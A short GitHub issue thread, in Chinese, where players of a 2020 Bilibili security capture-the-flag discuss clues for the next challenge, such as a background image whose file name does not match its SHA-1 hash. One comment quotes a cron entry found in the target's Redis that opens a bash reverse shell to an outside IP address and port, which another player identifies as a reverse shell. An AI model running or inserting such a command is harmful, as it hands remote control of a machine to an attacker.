### ISSUE TITLE
下一题的重心也许在于start.html的背景图，大家有没有思路？

### ISSUE THREAD

**Issue by AyalaKaguya** [AyalaKaguya/2020-bilibili-sec1024#1]
首先第六题指出 `结束亦是开始` 第六题的结尾为end.php，而靶机首页是start.html，所以肯定有一题藏在这里面。
 
排行榜的背景图与题库的背景图有些许不同（在于三三左手手势），可以从这里下手。

图片的名称来源于图片的sha1，而start.html背景图的sha1和图片本身对不上，故应该重点分析这张图片。

**Comment by kain-hao** [comment]
[这里](https://github.com/interesting-1024/end/issues/173)这个思路吗

**Comment by Tug0uFenr4r** [comment]
刚刚找到了点东西，我用redis连接到靶机，然后get flag9的时候出现了"* * * * * bash -i >& /dev/tcp/106.55.249.93/8888 0>&1"大佬知道这是啥嘛

**Comment by ghost** [comment]
> 刚刚找到了点东西，我用redis连接到靶机，然后get flag9的时候出现了"* * * * * bash -i >& /dev/tcp/106.55.249.93/8888 0>&1"大佬知道这是啥嘛

反弹shell
谁在搞这玩意

**Comment by AyalaKaguya** [comment]
今日没有进展🌚

**Comment by kain-hao** [comment]
有进展了(doge
